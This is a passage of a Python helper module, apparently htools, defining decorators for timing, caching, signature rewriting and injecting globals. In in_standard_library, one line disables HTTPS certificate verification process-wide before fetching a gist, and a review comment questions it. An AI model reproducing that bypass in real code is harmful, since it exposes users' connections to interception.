                for arg in sys.argv:
                    res += start_of_line if arg.startswith('-') else ' '
                    # Ensure non-primitive kwargs are quoted appropriately.
                    for start, end in ['[]', '()', '{}']:
                        if arg.startswith(start) and arg.endswith(end):
                            arg = f"'{arg}'"
                    res += arg
            # str() so a Path `path` (allowed per docstring) supports
            # .format(); Path has no format method for templates.
            save(res+'\n\n', Path(str(path).format(**fn_locals)), mode)
            return func(*args, **kwargs)
        return wrapped
    return decorator
def wrapmethods(*decorators, methods=(), internals=False):
    """Class decorator applying one or more decorators to every non-magic
    method (properties excluded) — e.g. slapping @debug on a whole class.

    Parameters
    ----------
    decorators: callable
        Decorators to apply to methods within the class. By default, methods
        with one or two leading underscores are excluded.
    methods: Iterable[str]
        Names of methods to wrap if you don't want to wrap all of them.
        Internal methods may be named here, but magic methods and properties
        cannot be wrapped.
    internals: bool
        If True, also wrap single-leading-underscore methods. Ignored when
        `methods` is given.
    """
    def wrapper(cls):
        # Map each candidate attribute name -> whether it's a method.
        if methods:
            candidates = {name: True for name in methods}
        else:
            candidates = {name: kind == 'method' for name, kind in
                          hdir(cls, False, internals=internals).items()}
        for name, is_method in candidates.items():
            obj = cls.__dict__[name]
            if not is_method or isinstance(obj, property):
                continue
            # staticmethod/classmethod wrappers must be peeled off first and
            # re-applied last, after all decorators.
            rewrap = identity
            if isinstance(obj, (staticmethod, classmethod)):
                rewrap = type(obj)
                obj = obj.__func__
            for dec in decorators:
                obj = dec(obj)
            setattr(cls, name, rewrap(obj))
        return cls
    return wrapper
def add_docstring(func):
    """Append `func`'s docstring to the decorated object's own docstring
    (separated by a blank line).

    Examples
    --------
    @add_docstring(nn.Conv2d)
    class ReflectionPaddedConv2d(nn.Module):
        ...
    """
    def decorator(new_func):
        # Combine docs first so @wraps copies the merged version onto the
        # wrapper below.
        new_func.__doc__ = f'{new_func.__doc__}\n\n{func.__doc__}'

        @wraps(new_func)
        def wrapper(*args, **kwargs):
            return new_func(*args, **kwargs)
        return wrapper
    return decorator
def timer(func):
    """Print a conservative wall-clock estimate of a function's runtime.
    Output for recursive functions may be hard to interpret (one message per
    level of recursion).

    Parameters
    -----------
    func: function
        The function to time.

    Examples
    ---------
    import time

    @timer
    def count_to(x):
        for i in range(x):
            time.sleep(0.5)

    >>> count_to(10)
    [TIMER]: count_to executed in approximately 5.0365 seconds.
    """
    @wraps(func)
    def wrapper(*args, **kwargs):
        t0 = time.perf_counter()
        result = func(*args, **kwargs)
        elapsed = time.perf_counter() - t0
        print(f'\n[TIMER]: {func.__name__} executed in approximately '
              f'{elapsed:.3f} seconds.\n')
        return result
    return wrapper
def handle(func=None, default=None):
    """Decorator providing basic error handling: any exception from the
    wrapped function is swallowed and `default` is returned instead. Often
    most useful without decorator sugar, e.g. mapping an existing function
    over a pandas Series.

    Parameters
    ----------
    func: callable
        The function to decorate.
    default: any
        Value returned whenever the wrapped function raises.

    Examples
    --------
    @handle
    def func():
        # Do something

    @handle(default=0)
    def func():
        # Do something

    def some_func(x):
        # Do something
    df.name.apply(handle(some_func))
    """
    # Parenthesized usage: wait for the function with `default` bound.
    if not func:
        return partial(handle, default=default)

    @wraps(func)
    def wrapper(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except Exception:
            return default
    return wrapper
@contextmanager
def block_timer(name=''):
    """Context manager timing an arbitrary block of code — like @timer, but
    usable outside of functions. Yields a dict that gains a 'duration' key
    (seconds, float) when the block exits.

    Examples
    --------
    with block_timer() as bt:
        arr = [str(i) for i in range(25_000_000)]
        first = None
        while first != '100':
            arr.pop(0)
    print(bt['duration'])
    1.25
    """
    stats = {}
    # Quote the label when one was given; empty label prints nothing extra.
    label = repr(name) + ' ' if name else name
    t0 = time.perf_counter()
    try:
        yield stats
    finally:
        # Record/report even if the block raised.
        elapsed = time.perf_counter() - t0
        print(f'[TIMER]: Block {label}executed in {elapsed:.3f} seconds.')
        stats['duration'] = elapsed
def count_calls(func):
    """Track how many times a function has been called via its `calls`
    attribute (also readable from inside the function itself). During the
    n'th call, `calls` already equals n — i.e. the current call is counted.
    """
    @wraps(func)
    def wrapper(*args, **kwargs):
        # Attribute is created lazily on the first call.
        wrapper.calls = getattr(wrapper, 'calls', 0) + 1
        return func(*args, **kwargs)
    return wrapper
def min_wait(seconds):
    """Decorator that skips executing the decorated function if it was
    executed very recently (within a user-specified wait period). Skipped
    calls return None.

    The resulting function's `last_called` attribute stores the value of
    perf_counter when it last actually executed. (Skipped calls no longer
    update it — previously every call, even a skipped one, reset the clock,
    so polling faster than `seconds` could starve the function forever.)

    Parameters
    ----------
    seconds: int or float
        Minimum wait period. Calling the function < `seconds` after its last
        execution returns None without executing.
    """
    if seconds >= 60 or seconds < 1:
        warnings.warn('min_wait is intended to be used with wait periods of a '
                      'few seconds. Wait periods under a second or over a '
                      'minute are not recommended - they may work but I '
                      'don\'t know.')

    def decorator(func):
        @wraps(func)
        def wrapper(*args, **kwargs):
            now = time.perf_counter()
            last_called = getattr(wrapper, 'last_called', float('-inf'))
            if now - last_called < seconds:
                print(f'Not calling: function was called less than {seconds} '
                      'seconds ago.')
                return
            # Record the time only when we actually execute.
            wrapper.last_called = now
            return func(*args, **kwargs)
        return wrapper
    return decorator
def mutable_cache(**preproc_funcs):
    """Cache function outputs like functools.lru_cache but allow mutable
    inputs. Each argument may be given a preprocessing function applied
    before hashing (e.g. cast a list to a tuple, or take id() of an object).

    Parameters
    ----------
    preproc_funcs: function
        Up to one preprocessing function per argument of the decorated
        function. Args without one are hashed directly — they still count
        toward cache-key identity.

    Examples
    --------
    @mutable_cache(seq=tuple, T=id)
    def seq_probs(seq, T):
        # Do something
    """
    cache = {}

    def decorator(func):
        # Args the user didn't cover get the identity preprocessor.
        for name in set(params(func)) - set(preproc_funcs):
            preproc_funcs[name] = identity

        @wraps(func)
        def wrapper(*args, **kwargs):
            bound = bound_args(func, args, kwargs)
            # Hash each (preprocessed) argument; the tuple of pairs is the
            # cache key.
            hashed = {name: hash(prep(bound[name]))
                      for name, prep in preproc_funcs.items()}
            key = tuple(hashed.items())
            if key not in cache:
                cache[key] = func(*args, **kwargs)
            return cache[key]
        return wrapper
    return decorator
def copy_func(func):
    """Duplicate a function. copy/deepcopy don't treat functions like other
    objects, so use this when you need a new function derived from another
    without mutating the original (as in `rename_params`).

    Parameters
    ----------
    func: function
        Function to duplicate.

    Returns
    -------
    function: Copy of input `func`. It shares the original's code object but
        is a distinct function object with an independent copy of the
        keyword-only defaults.

    Examples
    --------
    def foo(a, b=3, *args, c=5, **kwargs):
        return a, b, c, args, kwargs

    foo2 = copy_func(foo)
    >>> foo2.__code__ == foo.__code__
    True
    >>> foo2 == foo
    False
    """
    duplicate = types.FunctionType(func.__code__, func.__globals__,
                                   func.__name__, func.__defaults__,
                                   func.__closure__)
    # Shallow-copy kwonly defaults so edits on the copy don't leak back.
    duplicate.__kwdefaults__ = dict(getattr(func, '__kwdefaults__') or {})
    return update_wrapper(duplicate, func)
def rename_params(func, **old2new):
    """Rename one or more parameters. Docstrings and default arguments are
    updated accordingly. This is useful when working with code that uses
    `hasarg`. For example, my Incendio library uses parameter names
    to pass the correct arguments to different metrics.

    # TODO: looks like this updates the signature but doesn't actually change
    the variable names. So you can't call the decorated function with the
    new argument names.

    Parameters
    ----------
    func: function
        The old function to change.
    old2new: str
        One or more parameter names to change and their corresponding new
        names, e.g. a='y_true'. See Example below.

    Returns
    -------
    function: Same as input `func` but with updated parameter names.

    Examples
    --------
    def foo(a, b, *args, c=3, **kwargs):
        pass

    foo_metric = rename_params(foo, a='y_true', b='y_pred')

    `foo_metric` will work exactly like `foo` but its first two parameters
    will now be named "y_true" and "y_pred", respectively. """
    # Work on a copy so the original function's signature is untouched.
    new_func = copy_func(func)
    sig = signature(new_func)
    # Keyword-only defaults live in __kwdefaults__ rather than the
    # Parameter objects, so consult both when preserving defaults below.
    kw_defaults = func.__kwdefaults__ or {}
    # Parallel lists: parameter names and their Parameter objects, in order.
    names, params = map(list, zip(*sig.parameters.items()))
    for old, new in old2new.items():
        idx = names.index(old)
        default = kw_defaults.get(old) or params[idx].default
        # Rebuild the parameter under its new name, keeping kind + default.
        params[idx] = inspect.Parameter(new, params[idx].kind, default=default)
    # Only __signature__ is replaced; the code object (and hence the actual
    # local variable names) is unchanged — see TODO above.
    new_func.__signature__ = sig.replace(parameters=params)
    return new_func
def immutify_defaults(func):
    """Decorator making a function's default arguments effectively immutable:
    the originally provided defaults are snapshotted at decoration time and
    re-installed after every call. If a variable was used as a default, its
    later changes are ignored — each call sees the initially provided value.
    """
    # If `__hash__` is not None, the object is immutable already and needs
    # no defensive copy. Python sets __defaults__/__kwdefaults__ to None
    # when empty, which the `or ()` / `or {}` fallbacks accommodate.
    _defaults = tuple(o if getattr(o, '__hash__') else deepcopy(o)
                      for o in getattr(func, '__defaults__') or ()) or None
    _kwdefaults = {k: v if getattr(v, '__hash__') else deepcopy(v) for k, v
                   in (getattr(func, '__kwdefaults__') or {}).items()} or None

    @wraps(func)
    def wrapper(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        finally:
            # Restore pristine defaults even when the call raises;
            # previously an exception left any in-call mutations in place.
            wrapper.__defaults__ = func.__defaults__ = deepcopy(_defaults)
            wrapper.__kwdefaults__ = func.__kwdefaults__ = deepcopy(_kwdefaults)
    return wrapper
@contextmanager
def temporary_globals(func, **kwargs):
    """Temporarily inject key-value pairs into a function's global namespace.
    Function globals are used instead of globals() because the latter would
    be evaluated at import time and reflect htools/meta.py rather than the
    caller's scope. Used by the `add_kwargs` and `fallback` decorators
    (mostly toy functionality — risky to rely on in real code).
    """
    saved = func.__globals__.copy()
    func.__globals__.update(kwargs)
    try:
        yield
    finally:
        # Undo the injection: restore shadowed names, drop brand-new ones.
        for key in kwargs:
            if key in saved:
                func.__globals__[key] = saved[key]
            else:
                func.__globals__.pop(key)
def defined_functions(exclude=(), include_imported=False,
                      include_ipy_like=False):
    """Collect all functions currently defined in the __main__ module.

    Parameters
    ----------
    exclude: Iterable[str]
        Names of any functions to leave out of the results.
    include_imported: bool
        If True, also keep imported functions (this can be a LOT of functions
        if star imports were used). If False, only keep functions whose
        __module__ is '__main__'.
    include_ipy_like: bool
        If True, also keep functions with names like "_243", which seems to
        be how IPython stores previously called functions.

    Returns
    -------
    dict[str, FunctionType]: Maps each qualifying function name to the
    function object.
    """
    excluded = set(tolist(exclude))
    found = {}
    for attr_name, obj in vars(sys.modules['__main__']).copy().items():
        if not isinstance(obj, types.FunctionType):
            continue
        if not include_imported and obj.__module__ != '__main__':
            continue
        # IPython sometimes defines vars consisting only of underscores;
        # those strip down to empty strings, so append a digit before the
        # numeric check to keep them classified as IPython-like.
        if not include_ipy_like and (attr_name.strip('_') + '1').isnumeric():
            continue
        if attr_name in excluded:
            continue
        found[attr_name] = obj
    return found
def decorate_functions(decorator, exclude=(), include_imported=False,
                       include_ipy_like=False):
    """Apply a decorator to every function available in the current module's
    global scope (or some subset, depending on the args). Useful for
    debugging, e.g. `decorate_functions(debug)` in a script's __main__ block
    wraps each defined function with the `debug` decorator before use.

    Parameters
    ----------
    decorator: FunctionType
        Used to decorate all selected functions. Must accept only a function
        as an argument, so pre-apply any decorator-factory arguments first
        (e.g. pass `timeboxed(time)` rather than `timeboxed`).
    exclude: Iterable[str]
        Names of any functions to skip.
    include_imported: bool
        If True, also decorate imported functions (potentially a LOT when
        star imports are in play). If False, only functions defined in the
        current module.
    include_ipy_like: bool
        If True, also decorate functions with IPython-history-style names
        like "_243".
    """
    main_module = sys.modules['__main__']
    selected = defined_functions(exclude, include_imported, include_ipy_like)
    for fn_name, fn in selected.items():
        setattr(main_module, fn_name, decorator(fn))
def register_functions(prefix):
    """Build a registry dict of a module's functions sharing a common name
    prefix. Lets importing scripts dispatch dynamically through a dict
    instead of getattr messiness, importlib (which hides imports from the
    htools requirements.txt builder), or eval.

    Parameters
    ----------
    prefix: str
        Only functions whose names start with this prefix are registered; the
        prefix is stripped from the registry keys. E.g. with prefix='fit_',
        `def fit_knn(...)` is registered under the key 'knn', so a caller can
        do `FIT_FUNCS = register_functions(prefix='fit_')` in a modeling
        module and then `FIT_FUNCS[model](x, y)` elsewhere.

    Returns
    -------
    dict[str, function]
    """
    registry = {}
    for fn_name, fn in defined_functions().items():
        if fn_name.startswith(prefix):
            registry[fn_name.split(prefix)[-1]] = fn
    return registry
def source_code(name, lib_name='htools'):
    """Find the snippet of source code for a class/function defined in some
    library (usually htools). Like `inspect.getsource` except you just pass it
    strings and it handles all the imports.
    Warning: this was initially intended solely for use on htools-defined
    functionality, and it wasn't til afterwards that I realized it might extend
    reasonably well to other libraries. Known limitations: built in libraries
    (e.g. os) and big libraries with nested file structures (e.g. fastai)
    generally won't work.
    Parameters
    ----------
    name: str
        Class or function (usually defined in htools) that you want to see
        source code for.
    lib_name: str
        Name of library to check in, usually 'htools'.
    Returns
    -------
    tuple[str]: First item is the htools source code of the function/class
    (if not found, this is empty). Second item is a string that is either empty
    (if the function/class was found) or the name of a class/function most
    similar to the user-specified `name` if not.
    """
    # Bug fix: the original guard was `if lib_name not in locals()`, which is
    # effectively always True (the function's locals only contain its own
    # variables), so the sys.modules fast path was dead code. Check the
    # module cache directly; fall back to a fresh import.
    if lib_name in sys.modules:
        lib = sys.modules[lib_name]
    else:
        lib = importlib.import_module(lib_name)
    # As of version 6.3.1, htools __init__ imports most modules so we can often
    # find the desired object as an attribute of the module itself. But we
    # might change that behavior in the future so the pkutil method is a good
    # fallback (and even now, it's needed for pd_tools methods).
    names = set()
    no_match = ''
    for mod, mod_name, _ in pkgutil.iter_modules(lib.__path__):
        try:
            module = getattr(lib, mod_name)
            src = getsource(getattr(module, name))
            return src, no_match
        except AttributeError:
            # Statically parse the module file so we can at least suggest a
            # similarly-named definition below.
            with open(lib.__path__[0] + f'/{mod_name}.py', 'r') as f:
                tree = ast.parse(f.read())
            names.update(x.name for x in tree.body
                         if isinstance(x, (ast.ClassDef, ast.FunctionDef)))
    backup = ''
    if names:
        # fuzz/process come from fuzzywuzzy (imported at module level).
        backup = process.extract(name, names, limit=1, scorer=fuzz.ratio)[0][0]
    return no_match, backup
def fallback(meth=None, *, keep=(), drop=(), save=False):
    """Make instance/class attributes available as default arguments for a
    method. Kwargs can be passed in to override one or more of them. You can
    also choose for kwargs to update the instance attributes if desired.
    When using default values for keep/drop/save, the decorator can be used
    without parentheses. If you want to change one or more arguments, they
    must be passed in as keyword args (meth is never explicitly passed in, of
    course).
    Parameters
    ----------
    meth: method
        The method to decorate. Unlike the other arguments, this is passed in
        implicitly.
    keep: Iterable[str] or str
        Name(s) of instance attributes to include. If you specify a value
        here, ONLY these instance attributes will be made available as
        fallbacks. If you don't pass in any value, the default is for all
        instance attributes to be made available. You can specify `keep`,
        `drop`, or neither, but not both. This covers all possible options:
        keep only a few, keep all BUT a few, or keep all (drop all is the
        default case and doesn't require a decorator).
    drop: Iterable[str] or str
        Name(s) of instance attributes to ignore. I.e. if you want to make
        all instance attributes available as fallbacks except for self.df,
        you could specify drop=('df').
    save: bool
        If True, kwargs that share names with instance attributes will be
        overwritten with their new values. E.g. if we previously had
        self.lr = 3e-3 and you call your decorated method with
        obj.mymethod(lr=1), self.lr will be set to 1.
    Examples
    --------
    # Ex 1. self.a, self.b, and self.c are all available as defaults
    class Tree:
        def __init__(self, a, b, c=3):
            self.a = a
            self.b = b
            self.c = c
        @fallback
        def call(self, **kwargs):
            return a, b, c
    # Ex 2. self.b is not available as a default. We must put b in `call`'s
    # signature or the variable won't be accessible.
    class Tree:
        def __init__(self, a, b, c=3):
            self.a = a
            self.b = b
            self.c = c
        @fallback(drop=('b'))
        def call(self, b, **kwargs):
            return a, b, c
    # Ex 3. Self.b and self.c are available as defaults. If b or c are
    # specified in kwargs, the corresponding instance attribute will be updated
    # to take on the new value.
    class Tree:
        def __init__(self, a, b, c=3):
            self.a = a
            self.b = b
            self.c = c
        @fallback(keep=['b', 'c'], save=True)
        def call(self, a, **kwargs):
            return a, b, c
    """
    # Parenthesized usage (@fallback(...)) hits this branch: meth is None on
    # the first pass, so we return a partial that will receive meth on the
    # second pass.
    if meth is None:
        # Want to avoid errors if user passes in string or leaves comma out of
        # tuple when specifying keep/drop.
        return partial(fallback, keep=tolist(keep), drop=tolist(drop),
                       save=save)
    @wraps(meth)
    def wrapper(*args, **kwargs):
        # Assumes this decorates an instance/class method: args[0] is
        # self (or cls).
        self = args[0]
        self_kwargs = vars(self)
        if keep or drop: self_kwargs = select(self_kwargs, keep, drop)
        # Update kwargs with instance attribute defaults. Also update self if
        # user asked to save kwargs.
        for k, v in self_kwargs.items():
            if k not in kwargs:
                kwargs[k] = v
            elif save:
                setattr(self, k, kwargs[k])
        # Execute and return. temporary_globals makes each resolved kwarg
        # visible as a global inside meth for the duration of the call, then
        # restores the module's globals.
        with temporary_globals(meth, **kwargs):
            return meth(*args, **kwargs)
    return wrapper
def add_kwargs(*fns, required=True, variable=True):
    """When one or more functions are called inside another function, we often
    have the choice of accepting **kwargs in our outer function (downside:
    user can't see parameter names with quick documentation tools) or
    explicitly typing out each parameter name and default (downsides: time
    consuming and error prone since it's easy to update the inner function and
    forget to update the outer one). This lets us update the outer function's
    signature automatically based on the inner function(s)'s signature(s).
    The Examples section should make this more clear.
    The wrapped function must accept **kwargs, but you shouldn't refer to
    `kwargs` explicitly inside the function. Its variables will be made
    available essentially as global variables. This shares a related goal with
    fastai's `delegates` decorator but it provides a slightly different
    solution: `delegates` updates the quick documentation but the variables
    are still ultimately only available as kwargs. Here, they are available
    like regular variables.
    Note: don't actually use this for anything important, I imagine it could
    lead to some pretty nasty bugs. I was just determined to get something
    working.
    Parameters
    ----------
    fns: functions
        The inner functions whose signatures you wish to use to update the
        signature of the decorated outer function. When multiple functions
        contain a parameter with the same name, priority is determined by the
        order of `fns` (earlier means higher priority).
    required: bool
        If True, include required arguments from inner functions (that is,
        positional arguments or positional_or_keyword arguments with no
        default value). If False, exclude these (it may be preferable to
        explicitly include them in the wrapped function's signature).
    variable: bool
        If True, include *kwargs and **kwargs from the inner functions. They
        will be made available as {inner_function_name}_args and
        {inner_function_name}_kwargs, respectively (see Examples). Otherwise,
        they will be excluded.
    Examples
    --------
    def foo(x, c, *args, a=3, e=(11, 9), b=True, f=('a', 'b', 'c'), **kwargs):
        print('in foo')
        return x * c
    def baz(n, z='z', x='xbaz', c='cbaz'):
        print('in baz')
        return n + z + x + c
    baz comes before foo so its x param takes priority and has a default
    value of 'xbaz'. The decorated function always retains first priority so
    the c param remains positional despite its appearance as a positional
    arg in foo.
    @add_kwargs(baz, foo, positional=True)
    def bar(c, d=16, **kwargs):
        foo_res = foo(x, c, *foo_args, a=a, e=e, b=b, f=f, **foo_kwargs)
        baz_res = baz(n, z, x, c)
        return {'c': c, 'n': n, 'd': d, 'x': x, 'z': z, 'a': a,
                'e': e, 'b': b, 'f': f}
    bar ends up with the following signature:
    <Signature (c, n, d=16, x='xtri', foo_args=(), z='z', *, a=3, e=(11, 9),
    b=True, f=('a', 'b', 'c'), foo_kwargs={}, **kwargs)>
    Notice many variables are available inside the function even though they
    aren't explicitly hard-coded into our function definition. When using
    shift-tab in Jupyter or other quick doc tools, they will all be visible.
    You can see how passing in multiple functions can quickly get messy so
    if you insist on using this, try to keep it to 1-2 functions if possible.
    """
    # Parameter kinds eligible for grafting onto the outer signature.
    param_types = {Parameter.POSITIONAL_OR_KEYWORD, Parameter.KEYWORD_ONLY}
    if required: param_types.add(Parameter.POSITIONAL_ONLY)
    # Collect the Parameters contributed by a single inner function.
    # NOTE(review): `params` and `select` are htools helpers defined
    # elsewhere; `params(fn)` presumably returns signature(fn).parameters —
    # confirm in this module.
    def _args(fn):
        res = {}
        for k, v in params(fn).items():
            # If required=False, allow positional_or_keyword args with
            # defaults but not those without.
            if v.kind in param_types and (required
                                          or v.default != inspect._empty):
                res[k] = v
            # args/kwargs are converted to non-varying types and names are
            # adjusted to include function name. E.g. if we're adding kwargs
            # from function foo which accepts kwargs, that arg becomes a
            # keyword-only dictionary called foo_kwargs.
            elif variable:
                name = f'{fn.__name__}_{k}'
                if v.kind == Parameter.VAR_POSITIONAL:
                    kind = Parameter.POSITIONAL_OR_KEYWORD
                    default = ()
                elif v.kind == Parameter.VAR_KEYWORD:
                    kind = Parameter.KEYWORD_ONLY
                    default = {}
                else:
                    continue
                res[name] = Parameter(name, kind, default=default)
        return res
    # ChainMap operates in reverse order so functions that appear earlier in
    # `fns` take priority.
    extras_ = dict(ChainMap(*map(_args, fns)))
    def decorator(func):
        """First get params present in func's original signature, then get
        params from additional functions which are NOT present in original
        signature. Combine and sort param lists so positional args come first
        etc. Finally replace func's signature with our newly constructed one.
        """
        sig = signature(func)
        extras = [v for v in
                  select(extras_, drop=sig.parameters.keys()).values()]
        # Sort key: Parameter.kind sorts positional kinds before keyword-only
        # ones, and within a kind, params without defaults come first.
        parameters = sorted(
            list(sig.parameters.values()) + extras,
            key=lambda x: (x.kind, x.default != inspect._empty)
        )
        func.__signature__ = sig.replace(parameters=parameters)
        @wraps(func)
        def wrapper(*args, **kwargs):
            """Execute wrapped function in a context where kwargs are
            temporarily available as globals. Globals will be restored to
            its prior state once execution completes.
            """
            # Order matters here: defaults must come first so user-passed
            # args/kwargs will override them.
            kwargs = {**{p.name: p.default for p in extras},
                      **func.__signature__.bind(*args, **kwargs).arguments}
            with temporary_globals(func, **kwargs):
                res = func(**kwargs)
            return res
        return wrapper
    return decorator
@valuecheck
# NOTE(review): @valuecheck is an htools decorator defined elsewhere; it
# presumably enforces that `args`/`kwargs` only receive the annotated values
# (True, False, None) — confirm in this module.
def function_interface(present=(), required=(), defaults=(), startswith=(),
                       args: (True, False, None)=None,
                       kwargs: (True, False, None)=None,
                       like_func=None):
    """Decorator factory to enforce a some kind of function signature interface
    (i.e. the first two arguments must be ('model', 'x') or the function must
    accept **kwargs or the parameter 'learning_rate' must be present but not
    required because it has a default value).
    Parameters
    ----------
    present: Iterable[str]
        List of parameter names that must be present in the function signature.
        This will not check anything about their order or if they're required,
        just that they're present.
    required: Iterable[str]
        List of names that must be required parameters in the function (i.e.
        they have no default value).
    defaults: Iterable[str]
        List of names that must be present in the function signature with
        default values.
    startswith: Iterable[str]
        List of names that the function signature must start with. Order
        matters.
    args: bool
        If True, require function to accept *args. If False, require that it
        doesn't. If None, don't check either way.
    kwargs: bool
        If True, require function to accept **kwargs. If False, require that it
        doesn't. If None, don't check either way.
    like_func: None or function
        If provided, this function's signature will define the interface that
        all future decorated functions must match. Their name will obviously
        be different but all parameters must match (that means names, order,
        types, defaults, etc.).
    Returns
    -------
    function: A decorator that validates the decorated function's signature,
    raising RuntimeError on any violation, and otherwise returns a
    transparent wrapper around the unchanged function.
    """
    def decorator(func):
        # All checks below run once, at decoration time; the returned
        # wrapper adds no per-call behavior.
        def _param_status(param, params):
            # Classify a name as 'missing', 'required' (no default), or
            # 'optional' (has a default) within the signature.
            if param not in params:
                return 'missing'
            if params[param].default == inspect._empty:
                return 'required'
            return 'optional'
        params = signature(func).parameters
        name = func_name(func)
        for param in present:
            if param not in params:
                raise RuntimeError(
                    f'`{name}` signature must include parameter {param}.'
                )
        for param in required:
            if _param_status(param, params) != 'required':
                raise RuntimeError(
                    f'`{name}` signature must include parameter {param} with '
                    'no default parameter.'
                )
        for param in defaults:
            if _param_status(param, params) != 'optional':
                raise RuntimeError(
                    f'`{name}` signature must include parameter {param} with '
                    'default value.'
                )
        params_list = list(params.keys())
        for i, param in enumerate(startswith):
            if params_list[i] != param:
                raise RuntimeError(f'`{name}` signature\'s parameter #{i+1} '
                                   f'(1-indexed) must be named {param}.')
        if args is not None:
            has_args = any(v.kind == Parameter.VAR_POSITIONAL
                           for v in params.values())
            if has_args != args:
                raise RuntimeError(f'`{name}` signature must '
                                   f'{"" if args else "not"} accept *args.')
        if kwargs is not None:
            has_kwargs = any(v.kind == Parameter.VAR_KEYWORD
                             for v in params.values())
            if has_kwargs != kwargs:
                raise RuntimeError(
                    f'`{name}` signature must {"" if kwargs else "not"} '
                    'accept **kwargs.'
                )
        # Signatures are compared via their string forms, so names, order,
        # annotations, and defaults must all match.
        if like_func and str(signature(like_func)) != str(signature(func)):
            raise RuntimeError(f'`{name}` signature must match {like_func} '
                               'signature.')
        @wraps(func)
        def wrapper(*args, **kwargs):
            return func(*args, **kwargs)
        return wrapper
    return decorator
def Lazy(func=None, *, lazy=True):
    """Decorator that gives the wrapped function a boolean `lazy` keyword.
    When lazy=True the call returns a zero-argument callable that performs
    the real work only when invoked, somewhat like a coroutine; when
    lazy=False the function executes immediately. Nice for testing, and
    opens the door to some interesting patterns. The capitalized name avoids
    confusion with the `lazy` parameter itself.

    Examples
    --------
    @Lazy
    def foo(a, b=3):
        return a * b

    >>> foo(2, lazy=False)
    6
    >>> deferred = foo(2)
    >>> deferred()
    6

    The default mode can be flipped with keyword (not positional) usage:
    @Lazy(lazy=False)
    """
    # Support both bare @Lazy and parameterized @Lazy(lazy=...) usage.
    if func is None:
        return partial(Lazy, lazy=lazy)
    if 'lazy' in params(func):
        raise RuntimeError(
            f'Decorated function {func} must not have parameter named "lazy".'
            'It will be inserted automatically.'
        )

    @wraps(func)
    def wrapper(*args, lazy=lazy, **kwargs):
        deferred = lambda: func(*args, **kwargs)
        return deferred if lazy else deferred()
    return wrapper
def mark(**kwargs):
    """Decorator factory that stamps arbitrary attributes onto a function or
    method — e.g. tag all methods a particular caller invokes internally, all
    feature-engineering methods, or all methods that make http calls.

    Parameters
    ----------
    kwargs: (str, any)
        Attribute names and values to set on the decorated callable.

    Examples
    --------
    class FooBar:
        @mark(http=True, priority=1)
        def foo(self, x):
            ...
        @mark(priority=2)
        def bar(self, x):
            ...
    """
    def decorator(func):
        # Markers are attached to the raw function; wraps() then copies
        # func.__dict__ onto the wrapper so they stay visible after
        # decoration.
        for attr_name, attr_val in kwargs.items():
            setattr(func, attr_name, attr_val)

        @wraps(func)
        def wrapper(*call_args, **call_kwargs):
            return func(*call_args, **call_kwargs)
        return wrapper
    return decorator
def coroutine(coro):
    """Decorator that primes a coroutine, letting callers `send` real values
    immediately instead of first calling `coro.send(None)` themselves.
    """
    @wraps(coro)
    def primed(*args, **kwargs):
        # This body runs once per coroutine creation; all later interaction
        # goes through `send` on the generator object returned here.
        gen = coro(*args, **kwargs)
        gen.send(None)
        return gen
    return primed
@counted
def in_standard_library(package_name):
    """Define this in `meta` module since we require the `counted` decorator
    so we only make the http request the first time we execute the function
    (had trouble getting packaging arg `data_files` in setup.py to work as
    expected). Useful for determining what pip packages need to be installed in
    a project (if a package isn't built in, we presumably need to install it).
    Note to self: we could also implement this like:
    @mark(library=StandardLibrary())
    def in_standard_library(package_name):
        return package_name in in_standard_library.library
    where StandardLibrary is a class with a cached_property-decorated method
    to fetch the library list and a __contains__ method that delegates checks
    to the resulting attribute produced by the descriptor. Still deciding which
    pattern I prefer for the "do something on the first call" use case.
    Parameters
    ----------
    package_name: str
        Name of a package, e.g. numpy.
    Returns
    -------
    bool: True if package is included in the standard library, False otherwise.
    """
    global STANDARD_LIBRARY
    # call_count is attached by the @counted decorator; assumes it is still 0
    # while the first call's body executes (i.e. incremented afterwards) so
    # the gist is fetched exactly once per process — TODO confirm in
    # `counted`'s implementation.
    if in_standard_library.call_count == 0:
        # Brew-installed versions of python sometimes don't include the
        # necessary certificate for http requests to work.
        # NOTE(review): this disables HTTPS certificate verification
        # process-wide, not just for this one request — confirm that's
        # acceptable.
        ssl._create_default_https_context = ssl._create_unverified_context
        # STD_LIB_GIST (htools.config) is a gist URL whose JSON payload lists
        # standard-library module names.
        r = urllib.request.urlopen(STD_LIB_GIST)
        STANDARD_LIBRARY = json.loads(r.read())
    return package_name in STANDARD_LIBRARY
def get_module_docstring(path, default=''):
    """Pull the module-level docstring out of a python file.

    Parameters
    ----------
    path: str or Path
        File to extract the docstring from (pass __file__ for the current
        file).
    default: str
        Returned when the module has no docstring.

    Returns
    -------
    str
    """
    with open(path, 'r') as f:
        parsed = ast.parse(f.read())
    doc = ast.get_docstring(parsed)
    return doc if doc else default
def getindex(arr, val, default=-1):
    """Like list.index but returns a fallback value instead of raising when
    the value is absent, kind of like getattr.

    Parameters
    ----------
    arr: list
        The list to search in.
    val: any
        The item to search for.
    default: any
        Value to return if val is not in arr.

    Returns
    -------
    int or type(default): Index of the first occurrence of `val` in `arr`,
    else `default`.
    """
    # EAFP: one scan instead of the original's `in` membership check plus
    # .index() (two O(n) passes).
    try:
        return arr.index(val)
    except ValueError:
        return default
def set_module_global(module, key, value):
    """Create (or overwrite, with a warning) a global variable in an already
    imported module. A slightly hacky workaround that solves some types of
    circular imports.

    Parameters
    ----------
    module: str
        Name of module to create variable in (looked up in sys.modules).
    key: str
        Name of variable to create in module.
    value: any
        Value of variable to create in module.
    """
    target = sys.modules[module]
    if hasattr(target, key):
        warnings.warn(f'{module} has existing variable {key} that will be '
                      f'overwritten.')
    setattr(target, key, value)
def set_module_globals(module, **kwargs):
    """Set several global variables in an imported module at once.

    Parameters
    ----------
    module: str
        Module name.
    kwargs: any
        (Key, value) pairs: variable names and the values to assign them.
    """
    for var_name, var_value in kwargs.items():
        set_module_global(module, var_name, var_value)
class Partial:
    """More powerful (though also potentially more fragile) version of
    functools.partial that updates the resulting signature to work better with
    Jupyter's quick documentation feature. We also update __repr__, __str__,
    and __name__ attributes (optionally renaming the source function). Unlike
    functools.partial, we also reorder parameters so that those without
    defaults always come before those with defaults.
    Note: the resulting object is actually a callable class, not a function.
    """
    def __init__(self, func, name=None, **kwargs):
        """
        Parameters
        ----------
        func: function
        name: str or None
            If None, the source function's name will be used.
        kwargs: any
            Default arguments to set, like in functools.partial.
        """
